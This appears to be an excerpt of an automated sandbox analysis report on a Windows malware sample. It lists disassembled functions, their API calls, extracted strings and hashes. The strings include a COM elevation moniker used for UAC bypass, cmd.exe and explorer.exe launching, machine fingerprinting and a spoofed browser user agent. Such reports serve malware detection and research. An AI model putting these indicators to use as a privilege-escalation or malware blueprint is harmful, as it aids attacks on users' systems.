                          • GetCurrentProcess.KERNEL32(0047F5AC,?,00411363), ref: 00405718
                          • IsWow64Process.KERNEL32(00000000,?,00411363), ref: 0040571F
                          • GetProcessHeap.KERNEL32(?,00411363), ref: 00405725
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentHeapWow64
                          • String ID:
                          • API String ID: 1399170734-0
                          • Opcode ID: d496d118f09599941a26e9c733203f0a4a70c826b5b79e42def2219493e40757
                          • Instruction ID: af7c7970e4141fd9cc10a4436380ba79c7009fbdb76590e30a28943a2f631dd8
                          • Opcode Fuzzy Hash: d496d118f09599941a26e9c733203f0a4a70c826b5b79e42def2219493e40757
                          • Instruction Fuzzy Hash: 60C01270612208ABC3142FA4FC0C6893EB8AB88742B101032F609C2261CA76A4908A28
                          Function 00420800 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 0042085A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                          • Instruction ID: a4ad534ba2a4bf805be8d4b30e3cc69f12b4ab5ab6b99d98f60fd98b1426b109
                          • Opcode Fuzzy Hash: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                          • Instruction Fuzzy Hash: 4C21E8B4E00219EFCB04EF98D840AAFB7B4FB48304F50859AE924A7341D338AA51CF95
                          Function 00420760 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004207BA
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                          • Instruction ID: 4cf18e1defdbbf8cddfd966b63cc91ce39fe56379c2cbf457ff4961cd6393e44
                          • Opcode Fuzzy Hash: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                          • Instruction Fuzzy Hash: CE21FCB4E00219EFCB04DF99D884AAEB7B5FB88304F50854AE82567341D774A951CF55
                          Function 00418119 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004181C7
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: d0c201e7539ed4772464f86f123d7755a33d59086b143951abdcbfc63277f0e0
                          • Instruction ID: 0140c7c35a12c9d4d2f56a07fb600861de9f10bb1c8cf95726b017415bfd7771
                          • Opcode Fuzzy Hash: d0c201e7539ed4772464f86f123d7755a33d59086b143951abdcbfc63277f0e0
                          • Instruction Fuzzy Hash: 36018BB5A00208BBDB10DF94EC85BEE7774EF48704F10451DF604AB280EA799AC5C759
                          Function 00418132 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004181C7
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: 4ee6c721d7e74ba1b33508c59e008d077bbf9c5bf04e8e0524d3ee55038333e7
                          • Instruction ID: 0140c7c35a12c9d4d2f56a07fb600861de9f10bb1c8cf95726b017415bfd7771
                          • Opcode Fuzzy Hash: 4ee6c721d7e74ba1b33508c59e008d077bbf9c5bf04e8e0524d3ee55038333e7
                          • Instruction Fuzzy Hash: 36018BB5A00208BBDB10DF94EC85BEE7774EF48704F10451DF604AB280EA799AC5C759
                          Function 0042BA20 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_0002B9DE), ref: 0042BA25
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 0db803ec54fc10e4d329c8e57eb35a83b0b4a84cff09d8a8d2f413425a5d23dc
                          • Instruction ID: 36f714616a88036eb55af27c2dd355b8890758f503912e421fffb43fd9c6d75b
                          • Opcode Fuzzy Hash: 0db803ec54fc10e4d329c8e57eb35a83b0b4a84cff09d8a8d2f413425a5d23dc
                          • Instruction Fuzzy Hash: 159002B0351911568E006BB16C0E68567949A9970679154E2A111D4154EB6450849969
                          Function 00401C70 Relevance: 52.7, APIs: 17, Strings: 13, Instructions: 207stringCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00401CBC
                          • _memset.LIBCMT ref: 00401CF5
                            • Part of subcall function 0041D2C0: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0040108A), ref: 0041D2CB
                            • Part of subcall function 0041D2C0: GetProcAddress.KERNEL32(0040108A,IsWow64Process), ref: 0041D2E4
                          • __snwprintf.LIBCMT ref: 00401D1F
                          • __snwprintf.LIBCMT ref: 00401D41
                          • _memset.LIBCMT ref: 00401D60
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00401DB1
                          • lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 00401E04
                          • lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 00401E1B
                          • lstrcpyW.KERNEL32(-00000648,00000000), ref: 00401E32
                          • lstrcpyW.KERNEL32(-00000850,0047BA14), ref: 00401E49
                          • lstrcpyW.KERNEL32(-00000A58,?), ref: 00401E63
                          • lstrcpyA.KERNEL32(-00000C60,CoGetObject), ref: 00401E7A
                          • lstrcpyA.KERNEL32(-00000D28,CoInitialize), ref: 00401E92
                          • lstrcpyA.KERNEL32(-00000D8C,IIDFromString), ref: 00401EAA
                          • lstrcpyA.KERNEL32(-00000CC4,ExitProcess), ref: 00401EC1
                          • lstrcpyW.KERNEL32(-00000008,{6EDD6D74-C007-4E75-B76A-E5740995E24C}), ref: 00401ED6
                          • lstrcpyW.KERNEL32(-00000260,Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00401EEE
                            • Part of subcall function 00406DB0: _memset.LIBCMT ref: 00406DCA
                            • Part of subcall function 00406DB0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00406E85
                            • Part of subcall function 00406DB0: _memmove.LIBCMT ref: 00406EAF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$_memset$HandleModule__snwprintf$AddressCurrentProcProcess_memmove
                          • String ID: %s\SysWOW64\explorer.exe$%s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${6EDD6D74-C007-4E75-B76A-E5740995E24C}
                          • API String ID: 3624918361-107688120
                          • Opcode ID: 40525253a5e8a5da89c892eb0bd58939c720b1a21b5e82951a1952ac76e647ac
                          • Instruction ID: c8fee24260e9be7943ba9fe3ab86d48d53a8280aae697df63fa7837ff87ae17c
                          • Opcode Fuzzy Hash: 40525253a5e8a5da89c892eb0bd58939c720b1a21b5e82951a1952ac76e647ac
                          • Instruction Fuzzy Hash: 4281A475A40218ABDB24DF60DC49FD977B6EFD8700F0044E9F609A2290DB79AAD4CF58
                          Function 004134D0 Relevance: 42.5, APIs: 18, Strings: 6, Instructions: 478stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                            • Part of subcall function 0040FCB0: __snwprintf.LIBCMT ref: 0040FD07
                            • Part of subcall function 0040FCB0: DeleteFileW.KERNEL32(00000000), ref: 0040FD13
                            • Part of subcall function 0040FCB0: __snwprintf.LIBCMT ref: 0040FD79
                            • Part of subcall function 0040FCB0: __snwprintf.LIBCMT ref: 0040FDB3
                            • Part of subcall function 0040FCB0: DeleteFileW.KERNEL32(00000000), ref: 0040FDBF
                            • Part of subcall function 0040FCB0: RemoveDirectoryW.KERNEL32(00000000), ref: 0040FDC9
                            • Part of subcall function 0040FA70: __snwprintf.LIBCMT ref: 0040FB6F
                            • Part of subcall function 0040FA70: lstrlenW.KERNEL32(00000000), ref: 0040FB7E
                            • Part of subcall function 0040FA70: _memset.LIBCMT ref: 0040FBBA
                            • Part of subcall function 0040F950: __snwprintf.LIBCMT ref: 0040F9B1
                            • Part of subcall function 0040F950: lstrlenW.KERNEL32(00000000), ref: 0040F9BD
                            • Part of subcall function 0040F950: _memset.LIBCMT ref: 0040F9E7
                            • Part of subcall function 0040CB60: lstrlenW.KERNEL32(?), ref: 0040CBC0
                          • _memset.LIBCMT ref: 0041384A
                          • _memset.LIBCMT ref: 00413929
                          • __snwprintf.LIBCMT ref: 0041394E
                          • _memset.LIBCMT ref: 0041396D
                          • _memset.LIBCMT ref: 004139A6
                          • __snwprintf.LIBCMT ref: 004139D1
                          • __snwprintf.LIBCMT ref: 004139F5
                          • _memset.LIBCMT ref: 00413A12
                          • _memset.LIBCMT ref: 00413B1E
                          • lstrcpyW.KERNEL32(?,?), ref: 00413B68
                          • lstrcpyA.KERNEL32(?,?), ref: 00413B7C
                          • lstrcpyA.KERNEL32(?,?), ref: 00413B90
                          • lstrcpyA.KERNEL32(?,?), ref: 00413BA4
                          • lstrcpyA.KERNEL32(?,?), ref: 00413BB8
                          • lstrcpyA.KERNEL32(?,?), ref: 00413BCC
                          • lstrcpyA.KERNEL32(?,?), ref: 00413BDD
                          • lstrcpyW.KERNEL32(?,?), ref: 00413BF1
                          • lstrcpyW.KERNEL32(?,?), ref: 00413C05
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$__snwprintf_memset$lstrlen$DeleteFile$DirectoryRemove
                          • String ID: %s%s$D$SOFTWARE\%s$Software\%s$Software\%s$Software\%s
                          • API String ID: 3783373364-3139701001
                          • Opcode ID: 05fb12e27edcc6c2d6afc6ad5ca974c20c164695b6e9347c4c6c97bdc79d9b09
                          • Instruction ID: 554e4eb59d561f71bdd4bdf1aedcfae321491c4bd9710b2450149f4ca0220a30
                          • Opcode Fuzzy Hash: 05fb12e27edcc6c2d6afc6ad5ca974c20c164695b6e9347c4c6c97bdc79d9b09
                          • Instruction Fuzzy Hash: 4B226FB1E00228ABDB24DF50DC49FD9B778BB49704F0085EAE60DA6281DB795BC8CF55
                          Function 0040FE00 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 458COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$__snwprintf$_memmove$__flsbuf$lstrlen
                          • String ID: %s\%S.DLL$%s\cmd.exe$<$@$DLLCFG$open
                          • API String ID: 2279397060-2831413099
                          • Opcode ID: ef5c106684b76df30df0f945d1d101c7aa619b7a2f0416118fc1fccf789544c9
                          • Instruction ID: 9cb022f46225b0203a2f048387365820bfab8b78884083a4f67b60c848bcf3f8
                          • Opcode Fuzzy Hash: ef5c106684b76df30df0f945d1d101c7aa619b7a2f0416118fc1fccf789544c9
                          • Instruction Fuzzy Hash: 47127F71D00228ABDB24DF64DC45BDAB7B4EF49304F4045EAE60DA6281DBB86EC4CF59
                          Function 0041C690 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 209synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041C6B4
                          • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0041C6D8
                          • LocalFree.KERNEL32(00000000), ref: 0041C988
                          • CloseHandle.KERNEL32(?), ref: 0041C99D
                          • CloseHandle.KERNEL32(?), ref: 0041C9BD
                          • CloseHandle.KERNEL32(?), ref: 0041C9DD
                          Strings
                          • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 0041C721
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$Create$EventFreeLocalMutex
                          • String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                          • API String ID: 4059844998-3593534564
                          • Opcode ID: fabdf2de27c9ed5b3d3675b6cb3fc5b280882c19a611ed24f1dbdfca60594713
                          • Instruction ID: 8e2eb44450e80806de686dfde9ead24df060b4f6c6e6b17cac50333030547494
                          • Opcode Fuzzy Hash: fabdf2de27c9ed5b3d3675b6cb3fc5b280882c19a611ed24f1dbdfca60594713
                          • Instruction Fuzzy Hash: AE919E71A94304DFD768CFA4DD88FEA77B5AB85301F20407AE21A962E0C77859C8CF59
                          Function 004293D7 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00427259), ref: 004293DF
                          • __mtterm.LIBCMT ref: 004293EB
                            • Part of subcall function 00429124: DecodePointer.KERNEL32(?,0042954D,?,00427259), ref: 00429135
                            • Part of subcall function 00429124: TlsFree.KERNEL32(?,0042954D,?,00427259), ref: 0042914F
                            • Part of subcall function 00429124: DeleteCriticalSection.KERNEL32(00000000,00000000,76EE5810,?,0042954D,?,00427259), ref: 0042D6E2
                            • Part of subcall function 00429124: _free.LIBCMT ref: 0042D6E5
                            • Part of subcall function 00429124: DeleteCriticalSection.KERNEL32(?,76EE5810,?,0042954D,?,00427259), ref: 0042D70C
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00429401
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042940E
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042941B
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00429428
                          • TlsAlloc.KERNEL32(?,00427259), ref: 00429478
                          • TlsSetValue.KERNEL32(00000000,?,00427259), ref: 00429493
                          • __init_pointers.LIBCMT ref: 0042949D
                          • EncodePointer.KERNEL32(?,00427259), ref: 004294AE
                          • EncodePointer.KERNEL32(?,00427259), ref: 004294BB
                          • EncodePointer.KERNEL32(?,00427259), ref: 004294C8
                          • EncodePointer.KERNEL32(?,00427259), ref: 004294D5
                          • DecodePointer.KERNEL32(004292A8,?,00427259), ref: 004294F6
                          • __calloc_crt.LIBCMT ref: 0042950B
                          • DecodePointer.KERNEL32(00000000,?,00427259), ref: 00429525
                          • GetCurrentThreadId.KERNEL32 ref: 00429537
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 3698121176-3819984048
                          • Opcode ID: 1ca45e562565d4625d10964ac37ef6975b94661d637a3fff8b7ada5e85743eee
                          • Instruction ID: 27d2c4b6ff5e896d7de6a847955b3a202fa4fd1f8d9c6c08bd0691e81280500b
                          • Opcode Fuzzy Hash: 1ca45e562565d4625d10964ac37ef6975b94661d637a3fff8b7ada5e85743eee
                          • Instruction Fuzzy Hash: A7318031A106209BCBA26F79BC4D65E3EA1AB45730F50193FE408D32B0DB7A9885CF5C
                          Function 004222F0 Relevance: 37.7, APIs: 25, Instructions: 186synchronizationmemorythreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00422F70: lstrcpyA.KERNEL32(0047FF48,0047C710), ref: 00422FC4
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0042224D
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00422270
                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00422288
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00422351
                          • LocalAlloc.KERNEL32(00000040,00000004), ref: 00422368
                          • CreateThread.KERNEL32(00000000,00000000,00422650,00000000,00000000,00000000), ref: 00422394
                          • GetTickCount.KERNEL32 ref: 004223B1
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004223D9
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004223F3
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0042240E
                          • SetEvent.KERNEL32(00000000), ref: 004224C2
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004224CE
                          • CloseHandle.KERNEL32(00000000), ref: 004224E9
                          • LocalFree.KERNEL32(00000000), ref: 00422500
                          • CloseHandle.KERNEL32(00000000), ref: 0042250A
                          • CloseHandle.KERNEL32(?), ref: 00422539
                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00422596
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004225A7
                          • SetEvent.KERNEL32(00000000), ref: 004225B8
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004225C4
                          • CloseHandle.KERNEL32(00000000), ref: 004225D4
                          • CloseHandle.KERNEL32(00000000), ref: 004225EB
                          • CloseHandle.KERNEL32(?), ref: 00422604
                          • ReleaseMutex.KERNEL32(00000000), ref: 0042261E
                          • CloseHandle.KERNEL32(00000000), ref: 00422628
                          • CloseHandle.KERNEL32(00000000), ref: 00422638
                          • CloseHandle.KERNEL32(00000000), ref: 00422642
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocal$AllocCountFreeMutexReleaseThreadTicklstrcpy
                          • String ID:
                          • API String ID: 335535459-0
                          • Opcode ID: 728a46b10e1e2828013278dd28072e5c69e21a7936df1565eb22f3c40a2ad63d
                          • Instruction ID: faa1747313b486ccb3f578eecdb1efd3cb5c6adc5866f93d4004153facd3ec1a
                          • Opcode Fuzzy Hash: 728a46b10e1e2828013278dd28072e5c69e21a7936df1565eb22f3c40a2ad63d
                          • Instruction Fuzzy Hash: DE715071B04214FBD714DFA4EE8DBEE7775AB48301F508425F605A62E0C7B89988CF69
                          Function 00414030 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 267COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcscat$__snwprintf$_wcsrchr
                          • String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
                          • API String ID: 512907449-4258658051
                          • Opcode ID: e4d358261fa82804b23b57eafcd4642956b28081c5567a7a4f6f91946d3d581f
                          • Instruction ID: e6bc7966429afb5a548ca13169817c41486c1a403d71daee44646cc54eb2adf1
                          • Opcode Fuzzy Hash: e4d358261fa82804b23b57eafcd4642956b28081c5567a7a4f6f91946d3d581f
                          • Instruction Fuzzy Hash: 33B19171A4011DEBDB24DF90DC89FE9B379EBA4704F1081A9E1099B290D7789EC5CF58
                          Function 00404BF0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 257COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset
                          • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$D$Open
                          • API String ID: 2455478650-2887319354
                          • Opcode ID: 9fec37e90be1e5d711fe9ccb1d09c48fbe43895e1659c25594be146fa64a0b8d
                          • Instruction ID: c753a69d3ae3a34ff5e4dfe94b40a541838cb6eac363416705fce405ddd013d8
                          • Opcode Fuzzy Hash: 9fec37e90be1e5d711fe9ccb1d09c48fbe43895e1659c25594be146fa64a0b8d
                          • Instruction Fuzzy Hash: 46A1B9B1A00318ABDB20DF60DC45FDA7375AFD8704F0045A9F609A61C1EBB49AC4CF99
                          Function 0041A180 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 390COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: */*$<$GET
                          • API String ID: 0-4180448669
                          • Opcode ID: 387d3dfbc3b61c523a69bc3412403f4b330e72a210b5eceb4ec097b738280215
                          • Instruction ID: 7a99ec0447dbee7cda976f748ed39e4c3387e5de0808e2fe2ca4f614e4815334
                          • Opcode Fuzzy Hash: 387d3dfbc3b61c523a69bc3412403f4b330e72a210b5eceb4ec097b738280215
                          • Instruction Fuzzy Hash: 63021AB0901318DFDB14CFA4DD99BEEB7B4BB48304F104199E659AB280D778AAC4CF59
                          Function 00405110 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 352stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpyW.KERNEL32(?,0047C338), ref: 00405149
                          • lstrcpyW.KERNEL32(?,00479842), ref: 00405161
                          • lstrcpyW.KERNEL32(?,0047C3D4), ref: 00405179
                          • lstrcpyW.KERNEL32(?,00475E78), ref: 0040518F
                          • lstrcpyW.KERNEL32(?,00475DB0), ref: 004051A7
                          • lstrcpyW.KERNEL32(?,00475B58), ref: 004051BF
                          • lstrcpyW.KERNEL32(?,0047C29C), ref: 004051D5
                          • _memset.LIBCMT ref: 004052D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$_memset
                          • String ID: %s %s$HWID_%s
                          • API String ID: 173388403-149837424
                          • Opcode ID: 5d8877784fb2612adda9e3ece72a4bc02278172bfb60a6d555ad60f0d597c1dc
                          • Instruction ID: fcda67d3f53b81f4923cad0cc3be4f9e0ccbba969170b24f050bdd49e9c28d54
                          • Opcode Fuzzy Hash: 5d8877784fb2612adda9e3ece72a4bc02278172bfb60a6d555ad60f0d597c1dc
                          • Instruction Fuzzy Hash: 12E1A170A10204AFD718DF60EC49FEB7779EB48304F40857AE50DA6292E7B999C8CF59
                          Function 0041CB80 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 281librarymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • OpenMutexW.KERNEL32(00100000,00000000,0047B13E), ref: 0041CB92
                          • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041CBA2
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0041CBB9
                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0041CBDD
                          • CloseHandle.KERNEL32(?), ref: 0041CF7E
                          • CloseHandle.KERNEL32(00000000), ref: 0041CF8E
                          • CloseHandle.KERNEL32(?), ref: 0041CFB4
                          • LocalFree.KERNEL32(00000000), ref: 0041CFC4
                          • ExitProcess.KERNEL32 ref: 0041CFD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$Local$AllocExitFileFreeLibraryLoadModuleMutexNameOpenProcess
                          • String ID: KERNEL32.DLL
                          • API String ID: 1134908570-2576044830
                          • Opcode ID: 0da63d721fd1b8c6d508c4ec5c50e407317695fc09efdd9f34cfbae4d9aa62e2
                          • Instruction ID: 63940c65c2a952fe54cb436896a4f62cda96884ae11185d129b6539cdb42b133
                          • Opcode Fuzzy Hash: 0da63d721fd1b8c6d508c4ec5c50e407317695fc09efdd9f34cfbae4d9aa62e2
                          • Instruction Fuzzy Hash: 0BB18070A84304DBDB14AFA0ED89BEE77B5AB14705F20403AF619B62D0D7B858C5CB5E
                          Function 004089C0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 73memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,0041CD61), ref: 004089CD
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 004089E7
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00408A01
                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 00408A1F
                          • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 00408A32
                          • __snwprintf.LIBCMT ref: 00408A4E
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00408A5E
                          • LocalFree.KERNEL32(00000000), ref: 00408A6C
                          • LocalFree.KERNEL32(00000000), ref: 00408A76
                          • LocalFree.KERNEL32(00000000), ref: 00408A80
                          • LocalFree.KERNEL32(00000000), ref: 00408A91
                          • LocalFree.KERNEL32(00000000), ref: 00408A9B
                          • LocalFree.KERNEL32(00000000), ref: 00408AA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
                          • String ID: %s\cmd.exe
                          • API String ID: 4247545968-923833829
                          • Opcode ID: d6eb2a02f91aa35655597c519299a3ce8976dd758b8ff4c3930e6d3aac2b402a
                          • Instruction ID: 3f565d551990a7556bdd0c062e45508b88c72433986c6d439a255130911ae3d3
                          • Opcode Fuzzy Hash: d6eb2a02f91aa35655597c519299a3ce8976dd758b8ff4c3930e6d3aac2b402a
                          • Instruction Fuzzy Hash: C8212875B04309FBDB149FA4DD49BAE77B5AB88701F1044B9F705A66D0CA78A940CF18
                          Function 00422650 Relevance: 24.5, APIs: 16, Instructions: 459synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004226C6
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0042270E
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00422748
                          • WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 0042299E
